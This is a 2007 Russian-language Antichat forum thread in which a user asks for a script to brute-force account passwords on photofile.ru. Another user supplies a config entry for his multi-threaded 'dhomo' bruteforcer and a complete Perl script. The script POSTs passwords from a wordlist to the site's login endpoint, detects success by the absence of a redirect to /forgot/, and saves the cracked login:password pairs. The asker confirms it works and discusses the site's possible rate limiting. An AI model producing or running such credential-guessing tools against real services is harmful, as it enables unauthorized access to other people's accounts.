Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
скрипт для брута photofile.ru |
06.03.2007, 00:14
|
|
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762
Репутация:
-1
|
|
скрипт для брута photofile.ru
кто сумеет написать
вот форма для ввода пароля
Код:
<FORM action=http://photofile.ru/login/ method=post><INPUT type=hidden value=/index.php
name=return_url>
<TABLE cellSpacing=1 cellPadding=0 border=0>
<TR>
<TD align=right> Логин: </TD>
<TD><INPUT id=login_login tabIndex=2 size=10 name=login></TD>
<TD class=small noWrap><INPUT tabIndex=5 type=checkbox value=1
name=remember>запомнить</TD></TR>
<TR>
<TD> Пароль: </TD>
<TD noWrap><INPUT id=login_pass tabIndex=3 type=password size=10
name=password></TD>
<TD style="PADDING-LEFT: 4px"><INPUT class=button onclick="return LoginFormCheck();" tabIndex=4 type=submit value=войти></TD></TR>
<TR align=middle>
желательно на перле для возможности запуска на хосте
я пробовал wwwhack скорость достаточно приличная если
использовать самописный брут то наверное будет еще быстрее
при вводе правильного пароля переход на http://photofile.ru/index.php
неправильного http://photofile.ru/forgot/
на основе этого сразу можно сделать вывод о валидности пароля
wwwhack полностью загружает страницу http://photofile.ru/forgot
и ищет в ней слова которых нет в случаи правильного пароля
я поставил (Напоминание пароля Забыли пароль) наверняка этот метод медленнее
Последний раз редактировалось ysmat; 06.03.2007 в 00:20..
|
|
|
07.03.2007, 00:52
|
|
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме:
6144796
Репутация:
1095
|
|
найдите в разделе "про почту" мой брутфорсер dhomo.. добавьте в его базу строчку вида
['photofile.ru', 'return_url=%2Findex.php&login=zlogin&password=zpa ss', '/login/', 'http://photofile.ru/index.php', 300, 'Set-Cookie', 'photofile.ru']
нужный логин (или логины) пропишите в файле emails.txt как login@photofile.ru и сможете брутить в десяток потоков..
или заюзайте вот этот простенький скриптик:
Код:
#!/usr/bin/perl -w
use IO::Socket;
my $login = shift || die "enter login as argument\n";
open my $p, "<", 'passwords.txt' or die "Can\'t open passwords.txt\n";
while (<$p>) { chomp;
my $sock = new IO::Socket::INET (PeerAddr => 'photofile.ru',
PeerPort => 80, PeerProto => 'tcp', TimeOut => 20);
my $pdata="return_url=%2Findex.php&login=$login&password=$_";
my $len=length($pdata);
my $request="POST /login/ HTTP/1.1\n".
"Host: photofile.ru\n".
"User-Agent: Mozilla/5.0\n".
"Keep-Alive: 300\n".
"Connection: keep-alive\n".
"Referer: http://photofile.ru/index.php\n".
"Content-Type: application/x-www-form-urlencoded\n".
"Content-Length: $len\n\n$pdata";
print $sock $request;
sysread ($sock, my $an, 300); if ($an=~m/forgot/==0)
{ open my $l, ">>", 'result.txt'; print $l "$login:$_";
print "\a$login:$_"; close $l; exit;}}
close $p; print "nothing found..\n";
Последний раз редактировалось Digimortal; 07.03.2007 в 02:32..
|
|
|
|
07.03.2007, 21:45
|
|
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762
Репутация:
-1
|
|
на маленьком словаре все работает
а вот на большом при длительном бруте переодически выдает такие строчки
Код:
thread failed to start: Can't use an undefined value as a symbol reference at C:\dhomo.pl line 96, <$passwd> line 330
что они означают?
есть подозрения что photofile блокирует подбор через определенное время
ну все равно благадарю за помощь + поставил  |
|
|
|
07.03.2007, 21:55
|
|
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме:
6144796
Репутация:
1095
|
|
просто многопоточность у меня в бруте еще на стадии доработки ).. сколько потоков выставил?
и по поводу брутфорсера отписуйся в топике по нем лучше..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
